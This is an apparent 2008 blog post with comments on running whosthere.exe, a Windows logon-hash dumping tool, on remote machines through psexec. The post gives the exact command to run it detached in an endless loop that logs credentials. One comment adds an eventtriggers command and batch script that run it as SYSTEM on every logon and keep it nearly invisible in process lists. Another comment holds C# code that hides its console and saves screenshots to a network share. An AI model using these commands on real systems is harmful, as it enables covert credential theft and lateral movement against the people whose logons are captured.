Thursday, May 08, 2008

Using whosthere.exe with psexec

Ok, a few days ago I received the following question, and I have been asked the same thing before, so here it goes:

The question, more or less, is:

How do you run whosthere.exe on a remote machine using psexec, detached from any console, and leave it running there collecting hashes?

The answer is:

psexec \\ -d -c whosthere.exe -o myhashes.log -i

psexec's -d switch makes it launch whosthere.exe and return immediately, without waiting for the process to terminate.
whosthere's -o switch specifies the name of the file that will contain the list of unique credentials collected,
and the -i switch makes whosthere.exe run in an infinite loop, looking for new
logon credentials and storing them in the file specified by the -o switch.

Remember, of course, that you will probably need to pass the -u and -p switches to psexec, or you can first run something like the following from your machine

net use \\\ipc$ * /u:user password

and then run psexec.

Also remember that if you want to use whosthere-alt.exe, you (I think) can't use psexec's -c switch, because whosthere-alt.exe also requires pth.dll, so you will probably need to copy both whosthere-alt.exe and pth.dll to the target machine and then run psexec without the -c switch, specifying the path where whosthere-alt.exe and pth.dll are located.

Hope it helps!

3 comments:

natron[at]invisibledenizen.org said...

I prefer to attach the usage of whosthere to the Windows event log so that it will only run whenever someone logs on, and will also be sure to catch any short, automated logins that only last for 1 or 2 seconds. This has the added benefit of not being listed in the running processes for more than a very brief instant.

You can tie the command directly with eventtriggers if you want, but I prefer to use a simple batch script to capture date/time info and the EID that triggered it. I've included both below.

You can use PSEXEC to launch a remote command shell (use PSEXEC's interactive switch and tell it to run cmd.exe) and enter the eventtriggers command that way. I've also used WinRAR SFX packages to zip up whosthere.exe, run_whosthere.bat, and an installer batch file that will move the files to the correct locations and issue the eventtriggers command for me. Then you just run psexec once and you're done.

Regards,
N

The command to tie it to an event id is:

eventtriggers.exe /create /l Security /t SUCCESSAUDIT /ru SYSTEM /eid #EID value# /tr wt_#EID value# /tk "C:\path\to\the\file\run_whosthere.bat #EID value#"

And here's the batch file I use:
::==run_whosthere.bat
setLocal EnableDelayedExpansion

@echo off
REM You can attach this to the event ID for network logons by issuing the following at the command prompt (replace EID with the value that you are interested in. I usually attach to 528, 540, and 552.
REM http://www.ultimatewindowssecurity.com/securitylog/Event.aspx?EventID=528
REM http://www.ultimatewindowssecurity.com/securitylog/Event.aspx?EventID=540
REM http://www.ultimatewindowssecurity.com/securitylog/Event.aspx?EventID=552
REM eventtriggers.exe /create /l Security /t SUCCESSAUDIT /ru SYSTEM /eid #EID value# /tr wt_#EID value# /tk "D:\path\to\the\file\run_whosthere.bat #EID value#"

:: Count the number of whosthere_output files
for /f %%J in ('dir /b/od whosthere_output_*') do (set latest=%%~nJ)

:: Copy the old file to the new name, delete the old file
set NEW=%latest:~17,7%
set OLD=%NEW%
set /a NEW+=1
COPY whosthere_output_%OLD%.txt whosthere_output_%NEW%.txt >NUL
DEL whosthere_output_%OLD%.txt

:: If you use the eventtriggers.exe command from above, you will be passing the EID that occurred. Record that here and dump the notice to the logfile.
set /a EID = %1%
ECHO. ******************** Logon EID %EID% %Date% %Time% ******************** >> whosthere_output_%NEW%.txt

:: Run whosthere using the output file option.
whosthere.exe -o whosthere_output_%NEW%.txt

Anonymous said...

I’m trying to run psexec with an exe that contains this line of code:
gfx.CopyFromScreen(0, 0, 0, 0, new Size(screenWidth, screenHeight), CopyPixelOperation.SourceCopy);

It will hit an exception when run on a remote computer, but runs fine locally.

This is the exception:
Unhandled Exception: System.ComponentModel.Win32Exception: The handle is invalid

at System.Drawing.Graphics.CopyFromScreen(Int32 sourceX, Int32 sourceY, Int32
destinationX, Int32 destinationY, Size blockRegionSize)
at TakeScreenShot.Program.Main(String[] args)
c:\browsershotsexes\TakeScreenShot.exe exited on TestVistaErtang with error code
-532459699.

Thanks, Eric


PS This is all the code for the exe:

using System;
using System.Collections;
using System.Text;
using System.Drawing.Imaging;
using System.Drawing;
using System.Windows.Forms;
using System.Runtime.InteropServices;
//using SnipLib;
//using MS.Internal.Test.Tools

namespace TakeScreenShot
{
    class Program
    {
        #region Console Window property stuff
        [DllImport("kernel32.dll", ExactSpelling = true)]
        private static extern IntPtr GetConsoleWindow();

        private static IntPtr ThisConsole = GetConsoleWindow();

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
        private const int HIDE = 0;
        private const int MAXIMIZE = 3;
        private const int MINIMIZE = 6;
        private const int RESTORE = 9;
        #endregion

        static void Main(string[] args)
        {
            ShowWindow(ThisConsole, HIDE); //Hides Console Window
            Console.WriteLine("Minimizing the Current Console Window...");
            System.Threading.Thread.Sleep(2000);
            Rectangle scrBounds = Screen.GetBounds(new Point(0, 0));
            int screenWidth = scrBounds.Width;
            Console.WriteLine(screenWidth);
            int screenHeight = scrBounds.Height;
            Console.WriteLine(screenHeight);
            using (Bitmap bmpScreenShot = new Bitmap(screenWidth, screenHeight))
            {
                using (Graphics gfx = Graphics.FromImage((Image)bmpScreenShot))
                {
                    Console.WriteLine(Environment.MachineName);
                    gfx.CopyFromScreen(0, 0, 0, 0, new Size(screenWidth, screenHeight), CopyPixelOperation.SourceCopy);
                    bmpScreenShot.Save("\\\\ankursi-vista\\a-ertang\\" + Environment.MachineName + "_" + screenWidth.ToString() + "x" + screenHeight.ToString() + "_test.png", ImageFormat.Png);
                }
            }
            ShowWindow(ThisConsole, RESTORE);
        }
    }
}

hernan said...

That's probably because your program exe is running in the wrong window station.

Please move this question to www.hexale.org/forums so I can work with you on a solution.

Thanks!
Hernan